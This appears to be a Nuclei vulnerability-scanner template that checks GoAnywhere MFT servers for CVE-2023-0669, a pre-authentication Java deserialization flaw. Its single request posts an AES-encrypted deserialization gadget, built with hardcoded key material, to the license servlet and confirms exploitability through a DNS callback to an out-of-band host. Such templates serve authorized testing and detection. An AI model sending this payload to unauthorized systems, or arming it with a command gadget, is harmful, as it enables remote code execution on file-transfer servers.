id: CVE-2023-0669 info: name: GoAnywhere MFT - Remote Code Execution (ZeroDay) author: rootxharsh,iamnoooob,dhiyaneshdk,pdresearch severity: high description: | Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object. reference: - https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1 - https://infosec.exchange/@briankrebs/109795710941843934 - https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2023-0669 cwe-id: CWE-502 metadata: shodan-query: http.favicon.hash:1484947000 verified: "true" tags: cve,cve2023,rce,goanywhere,oast,kev requests: - raw: - | POST /goanywhere/lic/accept HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded bundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")), base64_decode("Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo="), base64_decode("QUVTL0NCQy9QS0NTNVBhZA==")))), '$2')}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - 'GoAnywhere' - type: status status: - 500